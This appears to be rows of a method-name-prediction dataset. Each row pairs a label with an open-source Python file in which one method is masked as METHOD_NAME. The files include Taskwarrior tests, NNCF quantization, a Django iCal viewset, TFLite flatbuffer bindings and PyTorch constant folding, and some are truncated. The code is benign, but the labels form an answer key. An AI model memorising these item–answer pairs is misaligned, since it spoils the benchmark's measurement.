id int64 0 300k | label stringlengths 1 74 ⌀ | text stringlengths 4k 8k |
|---|---|---|
298,400 | set up class | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
###############################################################################
#
# Copyright 2006 - 2021, Tomas Babej, Paul Beckingham, Federico Hernandez.
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
#
# https://www.opensource.org/licenses/mit-license.php
#
###############################################################################
import sys
import os
import unittest
# Ensure python finds the local simpletap module
sys.path.append(os.path.dirname(os.path.abspath(__file__)))
from basetest import Task, TestCase
class TestStart(TestCase):
@classmethod
def METHOD_NAME(cls):
"""Executed once before any test in the class"""
def setUp(self):
"""Executed before each test in the class"""
self.t = Task()
def test_start_stop(self):
"""Add, start, stop a task"""
self.t("add one")
self.t("add two")
code, out, err = self.t.runError("active")
self.t("1,2 start")
code, out, err = self.t("active")
self.assertIn("one", out)
self.assertIn("two", out)
self.t("1 stop")
code, out, err = self.t("active")
self.assertNotIn("one", out)
self.assertIn("two", out)
self.t("2 stop")
code, out, err = self.t.runError("active")
self.t("2 done")
code, out, err = self.t("list")
self.assertNotIn("two", out)
def test_journal_time(self):
"""Verify journal.time tracks state"""
self.t.config("journal.time", "1")
self.t("add one")
self.t("1 start")
code, out, err = self.t("long")
self.assertIn("Started task", out)
self.t("1 stop")
code, out, err = self.t("long")
self.assertIn("Stopped task", out)
def test_journal_annotations(self):
"""Verify journal start/stop annotations are used"""
self.t.config("journal.time", "1")
self.t.config("journal.time.start.annotation", "Nu kör vi")
self.t.config("journal.time.stop.annotation", "Nu stannar vi")
self.t("add one")
self.t("1 start")
code, out, err = self.t("long")
self.assertIn("Nu kör vi", out)
self.t("1 stop")
code, out, err = self.t("long")
self.assertIn("Nu stannar vi", out)
def test_start_remove_end(self):
"""Verify that starting a task removes end timestamp"""
self.t("add one")
uuid = self.t('_get 1.uuid')[1].strip()
self.t("1 done")
task = self.t.export()[0]
self.assertIn("end", task)
self.t(uuid + " start")
task = self.t.export()[0]
self.assertNotIn("end", task)
class TestActiveTaskHandling(TestCase):
def setUp(self):
self.t = Task()
self.t("add one +one")
def test_start_completed(self):
"""Completed task set to pending by start"""
self.t("+one done")
self.t("+one start")
tl = self.t.export()
self.assertEqual(tl[0]["status"], "pending")
def test_start_deleted(self):
"""Deleted task set to pending by start"""
self.t("+one delete", input="y\n")
self.t("+one start")
tl = self.t.export()
self.assertEqual(tl[0]["status"], "pending")
def test_start_nothing(self):
"""Verify error message when no tasks are specified"""
code, out, err = self.t.runError ("999 start")
self.assertIn("No tasks specified.", err)
def test_start_started(self):
"""Verify error when starting a started task"""
self.t("1 start")
code, out, err = self.t.runError("1 start")
self.assertIn("Task 1 'one' already started.", out)
class TestFeature608(TestCase):
def setUp(self):
"""Executed before each test in the class"""
self.t = Task()
def test_done_stop(self):
"""608: Done should stop an active task"""
self.t("add foo")
self.t("1 start")
code, out, err = self.t("export")
self.assertIn('"start":', out)
self.assertNotIn('"end":', out)
self.t("1 done")
code, out, err = self.t("export")
self.assertNotIn('"start":', out)
self.assertIn('"end":', out)
if __name__ == "__main__":
from simpletap import TAPTestRunner
unittest.main(testRunner=TAPTestRunner())
# vim: ai sts=4 et sw=4 ft=python |
298,401 | send to device | # Copyright (c) 2023 Intel Corporation
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from typing import Any, Dict, Optional, Tuple
import torch
from nncf.common.quantization.structs import QuantizationPreset
from nncf.data import Dataset
from nncf.parameters import ModelType
from nncf.parameters import TargetDevice
from nncf.quantization.advanced_parameters import AdvancedQuantizationParameters
from nncf.quantization.algorithms.post_training.algorithm import PostTrainingQuantization
from nncf.scopes import IgnoredScope
from nncf.torch.dynamic_graph.context import no_nncf_trace
from nncf.torch.dynamic_graph.io_handling import replicate_same_tensors
from nncf.torch.dynamic_graph.io_handling import wrap_nncf_model_inputs_with_objwalk
from nncf.torch.dynamic_graph.io_handling import wrap_nncf_model_outputs_with_objwalk
from nncf.torch.nested_objects_traversal import objwalk
from nncf.torch.nncf_network import NNCFNetwork
from nncf.torch.utils import get_model_device
from nncf.torch.utils import is_tensor
from nncf.torch.utils import training_mode_switcher
def create_nncf_network(model: torch.nn.Module, dataset: Dataset) -> NNCFNetwork:
"""
Creates NNCFNetwork instance for the PyTorch model where the first item of dataset
is used for model tracing.
:param model: PyTorch model
:param dataset: Dataset for model tracing
:return: NNCFNetwork instance for the input model
"""
def get_inputs(dataloader_output: Any) -> Tuple[Tuple, Dict]:
if not isinstance(dataloader_output, tuple):
dataloader_output = (dataloader_output,)
return dataloader_output, {}
def wrap_inputs(args, kwargs):
return wrap_nncf_model_inputs_with_objwalk(args, kwargs)
def wrap_outputs(retval):
return wrap_nncf_model_outputs_with_objwalk(retval)
def create_dummy_forward_fn(dataset, device):
def dummy_forward(model):
with no_nncf_trace():
args = next(iter(dataset.get_inference_data()))
args, kwargs = get_inputs(args)
def METHOD_NAME(tensor):
return tensor.to(device)
args = objwalk(args, is_tensor, METHOD_NAME)
kwargs = objwalk(kwargs, is_tensor, METHOD_NAME)
args, kwargs = wrap_inputs(args, kwargs)
retval = model(*args, **kwargs)
retval = replicate_same_tensors(retval)
return wrap_outputs(retval)
return dummy_forward
device = get_model_device(model)
dummy_forward_fn = create_dummy_forward_fn(dataset, device)
with training_mode_switcher(model, is_training=False):
nncf_network = NNCFNetwork(
model, dummy_forward_fn=dummy_forward_fn, wrap_inputs_fn=wrap_inputs, wrap_outputs_fn=wrap_outputs
)
nncf_network.nncf.get_tracing_context().disable_trace_dynamic_graph()
return nncf_network
def quantize_impl(
model: torch.nn.Module,
calibration_dataset: Dataset,
preset: QuantizationPreset,
target_device: TargetDevice,
subset_size: int,
fast_bias_correction: bool,
model_type: Optional[ModelType] = None,
ignored_scope: Optional[IgnoredScope] = None,
advanced_parameters: Optional[AdvancedQuantizationParameters] = None,
) -> torch.nn.Module:
"""
Experimental implementation of the `quantize()` method for the PyTorch backend.
"""
if fast_bias_correction is False:
raise ValueError(f"fast_bias_correction={fast_bias_correction} is not supported")
if target_device == TargetDevice.CPU_SPR:
raise RuntimeError("target_device == CPU_SPR is not supported")
nncf_network = create_nncf_network(model.eval(), calibration_dataset)
quantization_algorithm = PostTrainingQuantization(
preset=preset,
target_device=target_device,
subset_size=subset_size,
fast_bias_correction=fast_bias_correction,
model_type=model_type,
ignored_scope=ignored_scope,
advanced_parameters=advanced_parameters,
)
quantized_model = quantization_algorithm.apply(
nncf_network, nncf_network.nncf.get_graph(), dataset=calibration_dataset
)
quantized_model.nncf.disable_dynamic_graph_building()
return quantized_model |
298,402 | regenerate | from datetime import timedelta
from django.db.models import Q
from django.utils import timezone
from rest_framework import decorators, permissions, viewsets
from rest_framework.permissions import IsAuthenticated
from rest_framework.response import Response
from rest_framework.settings import api_settings
from lego.apps.events.models import Event
from lego.apps.ical import constants, utils
from lego.apps.ical.authentication import ICalTokenAuthentication
from lego.apps.ical.models import ICalToken
from lego.apps.ical.serializers import ICalTokenSerializer
from lego.apps.meetings import constants as meeting_constants
from lego.apps.meetings.models import Meeting, MeetingInvitation
from lego.apps.permissions.utils import get_permission_handler
class ICalTokenViewset(viewsets.ViewSet):
"""
API Endpoint to get a token for ical-urls.
To regenerate go to [regenerate](regenerate/).
"""
permission_classes = (IsAuthenticated,)
@decorators.action(detail=False, methods=["PATCH"])
def METHOD_NAME(self, request, *args, **kwargs):
"""Regenerate ICalToken."""
token, created = ICalToken.objects.get_or_create(user=request.user)
if not created:
token.METHOD_NAME()
serializer = ICalTokenSerializer(token)
return Response(serializer.data)
def list(self, request):
"""Get ICalToken."""
token = ICalToken.objects.get_or_create(user=request.user)[0]
serializer = ICalTokenSerializer(token)
return Response(serializer.data)
class ICalViewset(viewsets.ViewSet):
"""
API Endpoint to get ICalendar files for different kinds of events and meetings.
usage: [events/?token=yourtoken](events/?token=yourtoken)
"""
permission_classes = (permissions.IsAuthenticated,)
authentication_classes = api_settings.DEFAULT_AUTHENTICATION_CLASSES + [ # type: ignore
ICalTokenAuthentication
]
def list(self, request):
"""List all the different icals."""
token = ICalToken.objects.get_or_create(user=request.user)[0]
path = request.get_full_path()
data = {
"result": {
"calendars": [
{
"name": "events",
"description": "Calendar with all events on Abakus.no.",
"path": f"{path}events/",
},
{
"name": "personal",
"description": "Calendar with your favorite events & meetings.",
"path": f"{path}personal/",
},
{
"name": "registration",
"description": "Calendar with all event registration times.",
"path": f"{path}registrations/",
},
],
"token": ICalTokenSerializer(token).data,
}
}
return Response(data=data)
@decorators.action(detail=False, methods=["GET"])
def personal(self, request):
"""Personal ical route."""
calendar_type = constants.TYPE_PERSONAL
feed = utils.generate_ical_feed(request, calendar_type)
event_permission_handler = get_permission_handler(Event)
following_events = event_permission_handler.filter_queryset(
request.user, Event.objects.filter(followers__follower_id=request.user.id)
)
meeting_permission_handler = get_permission_handler(Meeting)
attending_invites = MeetingInvitation.objects.filter(
status=meeting_constants.ATTENDING, user=request.user
)
meetings = meeting_permission_handler.filter_queryset(
request.user,
Meeting.objects.annotate(
# Annotate the queryset with participating status for use in the feed generation.
# Otherwise lookups are very expensive
user_participating=Q(invitations__in=attending_invites)
),
)
utils.add_events_to_ical_feed(feed, following_events)
utils.add_meetings_to_ical_feed(feed, meetings, request.user)
return utils.render_ical_response(feed, calendar_type)
@decorators.action(detail=False, methods=["GET"])
def registrations(self, request):
"""Registration ical route."""
calendar_type = constants.TYPE_REGISTRATIONS
feed = utils.generate_ical_feed(request, calendar_type)
permission_handler = get_permission_handler(Event)
events = permission_handler.filter_queryset(
request.user, Event.objects.all().filter(end_time__gt=timezone.now())
)
for event in events:
reg_time = event.get_earliest_registration_time(request.user)
if not reg_time: # User cannot register
continue
ical_starttime = reg_time
ical_endtime = ical_starttime + timedelta(
minutes=constants.REGISTRATION_EVENT_LENGTH_IN_MINUTES
)
price = event.get_price(request.user) if event.is_priced else None
title = f"Reg: {event.title}"
utils.add_event_to_ical_feed(
feed,
event,
price=price,
title=title,
ical_starttime=ical_starttime,
ical_endtime=ical_endtime,
)
return utils.render_ical_response(feed, calendar_type)
@decorators.action(detail=False, methods=["GET"])
def events(self, request):
"""Event ical route."""
calendar_type = constants.TYPE_EVENTS
feed = utils.generate_ical_feed(request, calendar_type)
permission_handler = get_permission_handler(Event)
events = permission_handler.filter_queryset(
request.user,
Event.objects.all().filter(
end_time__gt=timezone.now()
- timedelta(days=constants.HISTORY_BACKWARDS_IN_DAYS)
),
)
utils.add_events_to_ical_feed(feed, events)
return utils.render_ical_response(feed, calendar_type) |
298,403 | test product filter | import json
from datetime import date, timedelta
from kitsune.dashboards.models import METRIC_CODE_CHOICES
from kitsune.dashboards.tests import WikiMetricFactory
from kitsune.products.tests import ProductFactory
from kitsune.sumo.templatetags.jinja_helpers import urlparams
from kitsune.sumo.tests import TestCase
from kitsune.sumo.urlresolvers import reverse
class WikiMetricAPITests(TestCase):
def test_default(self):
"""Test the default API call (no filtering)."""
today = date.today()
# Create 10 wikimetrics.
for i in range(10):
WikiMetricFactory(
code=METRIC_CODE_CHOICES[i % len(METRIC_CODE_CHOICES)][0],
date=today - timedelta(days=i),
value=i,
)
# Call the API.
response = self.client.get(urlparams(reverse("api.wikimetric_list"), format="json"))
self.assertEqual(200, response.status_code)
results = json.loads(response.content)["results"]
# Verify the results are what we created.
self.assertEqual(10, len(results))
for i in range(10):
result = results[i]
self.assertEqual(i, result["value"])
self.assertEqual(METRIC_CODE_CHOICES[i % len(METRIC_CODE_CHOICES)][0], result["code"])
self.assertEqual(str(today - timedelta(days=i)), result["date"])
def METHOD_NAME(self):
"""Test filtering results by product."""
today = date.today()
# Create products and associated wiki metrics.
p1 = ProductFactory()
p2 = ProductFactory()
# Create 3 for each product:
for i in range(3):
for p in [p1, p2]:
WikiMetricFactory(date=today - timedelta(days=i), product=p)
# Create one more for p2.
WikiMetricFactory(date=today - timedelta(days=4), product=p2)
# Call and verify the API for product=p1.
response = self.client.get(
urlparams(reverse("api.wikimetric_list"), format="json", product=p1.slug)
)
self.assertEqual(200, response.status_code)
results = json.loads(response.content)["results"]
self.assertEqual(3, len(results))
# Call and verify the API for product=p1.
response = self.client.get(
urlparams(reverse("api.wikimetric_list"), format="json", product=p2.slug)
)
self.assertEqual(200, response.status_code)
results = json.loads(response.content)["results"]
self.assertEqual(4, len(results))
def test_locale_filter(self):
"""Test filtering results by locale."""
today = date.today()
# Create 3 wikimetrics for es:
for i in range(3):
WikiMetricFactory(locale="es", date=today - timedelta(days=i))
# Create 1 for fr:
WikiMetricFactory(locale="fr")
# Call and verify the API for locale=es.
response = self.client.get(
urlparams(reverse("api.wikimetric_list"), format="json", locale="es")
)
self.assertEqual(200, response.status_code)
results = json.loads(response.content)["results"]
self.assertEqual(3, len(results))
# Call and verify the API for locale=fr.
response = self.client.get(
urlparams(reverse("api.wikimetric_list"), format="json", locale="fr")
)
self.assertEqual(200, response.status_code)
results = json.loads(response.content)["results"]
self.assertEqual(1, len(results))
def test_code_filter(self):
"""Test filtering results by code."""
today = date.today()
# Create 3 wikimetrics for active_contributors:
for i in range(3):
WikiMetricFactory(code=METRIC_CODE_CHOICES[0][0], date=today - timedelta(days=i))
# Create 1 for percent_localized_all:
WikiMetricFactory(code=METRIC_CODE_CHOICES[1][0])
# Call and verify the API for code=METRIC_CODE_CHOICES[0].
response = self.client.get(
urlparams(
reverse("api.wikimetric_list"), format="json", code=METRIC_CODE_CHOICES[0][0]
)
)
self.assertEqual(200, response.status_code)
results = json.loads(response.content)["results"]
self.assertEqual(3, len(results))
# Call and verify the API for code=METRIC_CODE_CHOICES[1].
response = self.client.get(
urlparams(
reverse("api.wikimetric_list"), format="json", code=METRIC_CODE_CHOICES[1][0]
)
)
self.assertEqual(200, response.status_code)
results = json.loads(response.content)["results"]
self.assertEqual(1, len(results)) |
298,404 | test ordered discrete | # Copyright (c) Meta Platforms, Inc. and affiliates.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
"""This test module contains old tests coming from the instrumentation package.
Some are still relevant, others are not, we should sort this out eventually.
Overall, they may be overly complicated because they were converted from the old framework...
"""
import typing as tp
import numpy as np
import pytest
from . import parameter as p
def test_instrumentation_set_standardized_data() -> None:
tokens = [p.Choice(list(range(5))), p.Scalar(init=3).set_mutation(sigma=4)]
instru = p.Instrumentation(*tokens)
values = instru.spawn_child().set_standardized_data([0, 200, 0, 0, 0, 2]).args
assert values == (1, 11)
np.testing.assert_raises(
ValueError, instru.spawn_child().set_standardized_data, [0, 0, 200, 0, 0, 0, 2, 3]
)
def test_instrumentation() -> None:
instru = p.Instrumentation(p.Scalar(), 3, b=p.Choice([0, 1, 2, 3]), a=p.TransitionChoice([0, 1, 2, 3]))
np.testing.assert_equal(instru.dimension, 6)
instru2 = p.Instrumentation(p.Scalar(), 3, b=p.Choice([0, 1, 2, 3]), a=p.TransitionChoice([0, 1, 2, 3]))
np.testing.assert_equal(instru2.dimension, 6)
data = instru2.spawn_child(new_value=((4, 3), dict(a=0, b=3))).get_standardized_data(reference=instru2)
np.testing.assert_array_almost_equal(data, [4, -1.1503, 0, 0, 0, 0.5878], decimal=4)
child = instru.spawn_child()
with p.helpers.deterministic_sampling(child):
args, kwargs = child.set_standardized_data(data).value
assert (args, kwargs) == ((4.0, 3), {"a": 0, "b": 3})
assert "3),Dict(a=TransitionChoice(choices=Tuple(0,1,2,3)," in repr(
instru
), f"Erroneous representation {instru}"
# check deterministic
data = np.array([0.0, 0, 0, 0, 0, 0])
total = 0
for _ in range(24):
child = instru.spawn_child()
with p.helpers.deterministic_sampling(child):
total += child.set_standardized_data(data).kwargs["b"]
np.testing.assert_equal(total, 0)
# check stochastic
for _ in range(24):
total += instru.spawn_child().set_standardized_data(data).kwargs["b"]
assert total != 0
# check duplicate
# instru2 = mvar.Instrumentation(*instru.args, **instru.kwargs) # TODO: OUCH SILENT FAIL
instru2.copy()
data = np.random.normal(0, 1, size=6)
values: tp.List[tp.Any] = []
for val_instru in [instru, instru2]:
child = val_instru.spawn_child()
with p.helpers.deterministic_sampling(child):
values.append(child.set_standardized_data(data).value)
assert values[0] == values[1]
# check naming
instru_str = (
"Instrumentation(Tuple(Scalar[sigma=Scalar{exp=2.03}],3),"
"Dict(a=TransitionChoice(choices=Tuple(0,1,2,3),"
"indices=Array{Cd(0,4),Add,Int},transitions=[1. 1.]),"
"b=Choice(choices=Tuple(0,1,2,3),indices=Array{(1,4),SoftmaxSampling})))"
)
assert instru.name == instru_str
assert instru.set_name("blublu").name == "blublu"
def _false(value: tp.Any) -> bool: # pylint: disable=unused-argument
return False
def test_instrumentation_copy() -> None:
instru = p.Instrumentation(p.Scalar(), 3, b=p.Choice(list(range(1000)))).set_name("bidule")
instru.register_cheap_constraint(_false)
copied = instru.copy()
assert copied.name == "bidule"
assert copied.random_state is not instru.random_state
# test that variables do not hold a random state / interfere
instru.random_state = np.random.RandomState(12)
copied.random_state = np.random.RandomState(12)
kwargs1 = instru.spawn_child().set_standardized_data([0] * 1001).kwargs
kwargs2 = copied.spawn_child().set_standardized_data([0] * 1001).kwargs
assert kwargs1 == kwargs2
assert not copied.satisfies_constraints()
def test_instrumentation_init_error() -> None:
variable = p.Scalar()
np.testing.assert_raises(ValueError, p.Instrumentation, variable, variable)
def test_softmax_categorical_deterministic() -> None:
token = p.Choice(["blu", "blublu", "blublublu"], deterministic=True)
assert token.set_standardized_data([1, 1, 1.01]).value == "blublublu"
def test_softmax_categorical() -> None:
np.random.seed(12)
token = p.Choice(["blu", "blublu", "blublublu"])
assert token.spawn_child().set_standardized_data([0.5, 1.0, 1.5]).value == "blublu"
new_token = token.spawn_child(new_value="blu")
child = token.spawn_child()
with p.helpers.deterministic_sampling(child):
value = child.set_standardized_data(new_token.get_standardized_data(reference=token)).value
assert value == "blu"
def METHOD_NAME() -> None:
token = p.TransitionChoice(["blu", "blublu", "blublublu"])
assert token.spawn_child().set_standardized_data([5]).value == "blublublu"
assert token.spawn_child().set_standardized_data([0]).value == "blublu"
new_token = token.spawn_child(new_value="blu")
child = token.spawn_child()
with p.helpers.deterministic_sampling(child):
value = child.set_standardized_data(new_token.get_standardized_data(reference=token)).value
assert value == "blu"
def test_scalar() -> None:
token = p.Scalar().set_integer_casting()
assert token.spawn_child().set_standardized_data([0.7]).value == 1
new_token = token.spawn_child(new_value=1)
assert new_token.get_standardized_data(reference=token).tolist() == [1.0]
# bouncing with large values clips to the other side
@pytest.mark.parametrize("value,expected", [(0, 0.01), (10, 0.001), (-30, 0.1), (20, 0.001)]) # type: ignore
def test_log(value: float, expected: float) -> None:
var = p.Log(lower=0.001, upper=0.1)
out = var.spawn_child().set_standardized_data(np.array([value]))
np.testing.assert_approx_equal(out.value, expected, significant=4)
repr(var)
def test_log_int() -> None:
var = p.Log(lower=300, upper=10000).set_integer_casting()
out = var.spawn_child().set_standardized_data(np.array([0]))
assert out.value == 1732
# note: 0.9/0.9482=0.9482/0.999
# with very large values, bouncing clips to the other side
@pytest.mark.parametrize("value,expected", [(0, 0.9482), (-11, 0.999), (10, 0.9)]) # type: ignore
def test_log_9(value: float, expected: float) -> None:
var = p.Log(lower=0.9, upper=0.999)
out = var.spawn_child().set_standardized_data(np.array([value]))
np.testing.assert_approx_equal(out.value, expected, significant=4) |
298,405 | update state | # encoding: utf-8
#
# Project: MXCuBE
# https://github.com/mxcube.
#
# This file is part of MXCuBE software.
#
# MXCuBE is free software: you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# MXCuBE is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU General Lesser Public License
# along with MXCuBE. If not, see <http://www.gnu.org/licenses/>.
"""
Microdiff with Exporter implementation of AbstartNState
Example xml file:
<device class="ExporterNState">
<username>Fluorescence Detector</username>
<exporter_address>wid30bmd2s:9001</exporter_address>
<value_channel_name>FluoDetectorIsBack</value_channel_name>
<state_channel_name>State</state_channel_name>
<values>{"IN": False, "OUT": True}</values>
</device>
"""
from enum import Enum
from gevent import sleep
from mxcubecore.HardwareObjects.abstract.AbstractNState import AbstractNState
from mxcubecore.Command.Exporter import Exporter
from mxcubecore.Command.exporter.ExporterStates import ExporterStates
__copyright__ = """ Copyright © 2020 by the MXCuBE collaboration """
__license__ = "LGPLv3+"
class ExporterNStateMockup(AbstractNState):
"""Microdiff with Exporter implementation of AbstartNState"""
SPECIFIC_STATES = ExporterStates
def __init__(self, name):
AbstractNState.__init__(self, name)
# self._mock_value = "OUT"
# self._mock_state= "READY"
def init(self):
"""Initialise the device"""
AbstractNState.init(self)
value = [e.value for e in self.VALUES][1]
self.update_state(self.STATES.READY)
self.update_value(value)
def _wait_ready(self, timeout=None):
"""Wait timeout seconds till status is ready.
Args:
timeout(float): Timeout [s]. None means infinite timeout.
"""
sleep(0.5)
def METHOD_NAME(self, state=None):
"""To be used to update the state when emiting the "update" signal.
Args:
state (str): optional state value
Returns:
(enum 'HardwareObjectState'): state.
"""
if not state:
state = self.get_state()
else:
state = self._value2state(state)
return self.update_state(state)
def _value2state(self, state):
"""Convert string state to HardwareObjectState enum value
Args:
state (str): the state
Returns:
(enum 'HardwareObjectState'): state
"""
try:
return self.SPECIFIC_STATES.__members__[state.upper()].value
except (AttributeError, KeyError):
return self.STATES.UNKNOWN
# def get_state(self):
# """Get the device state.
# Returns:
# (enum 'HardwareObjectState'): Device state.
# """
# return self._value2state(self._mock_state)
def abort(self):
"""Stop the action."""
pass
def _set_value(self, value):
"""Set device to value
Args:
value (str, int, float or enum): Value to be set.
"""
self.update_state(self.STATES.BUSY)
sleep(0.5)
if isinstance(value, Enum):
if isinstance(value.value, (tuple, list)):
value = value.value[0]
else:
value = value.value
self._nominal_value = value
self.update_state(self.STATES.READY)
def get_value(self):
"""Get the device value
Returns:
(Enum): Enum member, corresponding to the value or UNKNOWN.
"""
# _val = self._mock_value
return self.value_to_enum(self._nominal_value) |
298,406 | add proj clip | # SPDX-License-Identifier: Apache-2.0
# automatically generated by the FlatBuffers compiler, do not modify
# namespace: tflite
import flatbuffers
from flatbuffers.compat import import_numpy
np = import_numpy()
class LSTMOptions(object):
__slots__ = ['_tab']
@classmethod
def GetRootAs(cls, buf, offset=0):
n = flatbuffers.encode.Get(flatbuffers.packer.uoffset, buf, offset)
x = LSTMOptions()
x.Init(buf, n + offset)
return x
@classmethod
def GetRootAsLSTMOptions(cls, buf, offset=0):
"""This method is deprecated. Please switch to GetRootAs."""
return cls.GetRootAs(buf, offset)
@classmethod
def LSTMOptionsBufferHasIdentifier(cls, buf, offset, size_prefixed=False):
return flatbuffers.util.BufferHasIdentifier(buf, offset, b"\x54\x46\x4C\x33", size_prefixed=size_prefixed)
# LSTMOptions
def Init(self, buf, pos):
self._tab = flatbuffers.table.Table(buf, pos)
# LSTMOptions
def FusedActivationFunction(self):
o = flatbuffers.number_types.UOffsetTFlags.py_type(self._tab.Offset(4))
if o != 0:
return self._tab.Get(flatbuffers.number_types.Int8Flags, o + self._tab.Pos)
return 0
# LSTMOptions
def CellClip(self):
o = flatbuffers.number_types.UOffsetTFlags.py_type(self._tab.Offset(6))
if o != 0:
return self._tab.Get(flatbuffers.number_types.Float32Flags, o + self._tab.Pos)
return 0.0
# LSTMOptions
def ProjClip(self):
o = flatbuffers.number_types.UOffsetTFlags.py_type(self._tab.Offset(8))
if o != 0:
return self._tab.Get(flatbuffers.number_types.Float32Flags, o + self._tab.Pos)
return 0.0
# LSTMOptions
def KernelType(self):
o = flatbuffers.number_types.UOffsetTFlags.py_type(self._tab.Offset(10))
if o != 0:
return self._tab.Get(flatbuffers.number_types.Int8Flags, o + self._tab.Pos)
return 0
# LSTMOptions
def AsymmetricQuantizeInputs(self):
o = flatbuffers.number_types.UOffsetTFlags.py_type(self._tab.Offset(12))
if o != 0:
return bool(self._tab.Get(flatbuffers.number_types.BoolFlags, o + self._tab.Pos))
return False
def Start(builder): builder.StartObject(5)
def LSTMOptionsStart(builder):
"""This method is deprecated. Please switch to Start."""
return Start(builder)
def AddFusedActivationFunction(builder, fusedActivationFunction): builder.PrependInt8Slot(0, fusedActivationFunction, 0)
def LSTMOptionsAddFusedActivationFunction(builder, fusedActivationFunction):
"""This method is deprecated. Please switch to AddFusedActivationFunction."""
return AddFusedActivationFunction(builder, fusedActivationFunction)
def AddCellClip(builder, cellClip): builder.PrependFloat32Slot(1, cellClip, 0.0)
def LSTMOptionsAddCellClip(builder, cellClip):
"""This method is deprecated. Please switch to AddCellClip."""
return AddCellClip(builder, cellClip)
def METHOD_NAME(builder, projClip): builder.PrependFloat32Slot(2, projClip, 0.0)
def LSTMOptionsAddProjClip(builder, projClip):
"""This method is deprecated. Please switch to AddProjClip."""
return METHOD_NAME(builder, projClip)
def AddKernelType(builder, kernelType): builder.PrependInt8Slot(3, kernelType, 0)
def LSTMOptionsAddKernelType(builder, kernelType):
"""This method is deprecated. Please switch to AddKernelType."""
return AddKernelType(builder, kernelType)
def AddAsymmetricQuantizeInputs(builder, asymmetricQuantizeInputs): builder.PrependBoolSlot(4, asymmetricQuantizeInputs, 0)
def LSTMOptionsAddAsymmetricQuantizeInputs(builder, asymmetricQuantizeInputs):
"""This method is deprecated. Please switch to AddAsymmetricQuantizeInputs."""
return AddAsymmetricQuantizeInputs(builder, asymmetricQuantizeInputs)
def End(builder): return builder.EndObject()
def LSTMOptionsEnd(builder):
"""This method is deprecated. Please switch to End."""
return End(builder |
298,407 | is impure | import collections
from typing import Any, Dict
import torch
import torch.utils._pytree as pytree
aten = torch.ops.aten
def replace_node_with_constant(gm, node, constant):
g = gm.graph
if not hasattr(gm, "_frozen_param_count"):
gm._frozen_param_count = 0
i = gm._frozen_param_count
while True:
qualname = f"_frozen_param{i}"
if not hasattr(gm, qualname):
break
i += 1
gm._frozen_param_count = i + 1
with g.inserting_before(node):
new_input_node = g.create_node("get_attr", qualname, (), {})
node.replace_all_uses_with(new_input_node)
new_input_node.meta.update(node.meta)
g.erase_node(node)
# needed to suppress `does not reference an nn.Module, nn.Parameter, or buffer` warning
gm.register_buffer(qualname, constant)
setattr(gm, qualname, constant)
class ConstantFolder(torch.fx.Interpreter):
def __init__(
self,
gm,
skip_constructors=False,
):
super().__init__(gm)
self.node_replacements: Dict[torch.fx.Node, Any] = {}
self.replaced_uses: Dict[torch.fx.Node, int] = collections.Counter()
self.unknown_value = object()
self.skip_constructors: bool = skip_constructors
# overwrite this to deallocate env values if their only remaining use
# is the output
self.user_to_last_uses = self.node_to_last_non_output_use()
def METHOD_NAME(self, node: torch.fx.node.Node):
if node.target == torch.ops.quantized_decomposed.dequantize_per_channel.default:
# For the pattern fp32_weight -> quantized_decomposed.quantize_per_channel.default
# -> quantized_decomposed.dequantize_per_channel.default
# We only folding fp32_weight -> quantized_decomposed.quantize_per_channel.default into
# int8_weight and leave quantized_decomposed.dequantize_per_channel.default in graph to be fused
return True
return False
def node_to_last_non_output_use(self):
last_non_output_use = collections.defaultdict(list)
seen_uses = set()
output_node = next(iter(reversed(self.module.graph.nodes)))
for node in reversed(self.module.graph.nodes):
if node.target == "output":
continue
def add_use(inp):
if inp in seen_uses:
return
seen_uses.add(inp)
last_non_output_use[node].append(inp)
pytree.tree_map_only(torch.fx.Node, add_use, (node.args, node.kwargs))
# if this node is only used in output, we want to gc it right away
if len(node.users) == 1 and output_node in node.users:
last_non_output_use[node].append(node)
return last_non_output_use
def run_node(self, node):
if node.target == "output":
# because we remove nodes from env on last non output use,
# re-define them now or we'll get error in interpreter
def set_env(arg):
self.env[arg] = self.unknown_value
pytree.tree_map_only(torch.fx.Node, set_env, node.args)
return super().run_node(node)
args, kwargs = self.fetch_args_kwargs_from_env(node)
flattened_inputs = pytree.tree_flatten((args, kwargs))[0]
if self.unknown_value in flattened_inputs:
return self.unknown_value
# TODO - fix errors with this
if (
node.op == "call_function"
and node.target == aten._efficientzerotensor.default
):
return self.unknown_value
# skip constructors, since inductor generates optimal code for them already
# and turning into tensor would result in an additional global memory read
# TODO - more complicated strategy
if (
self.skip_constructors
and node.op != "get_attr"
and not any(isinstance(e, torch.Tensor) for e in flattened_inputs)
):
return self.unknown_value
# All mutations should either be removed or on inputs which we did not make constant
if (
isinstance(node.target, torch._ops.OpOverload)
and torch.Tag.nondeterministic_seeded in node.target.tags
):
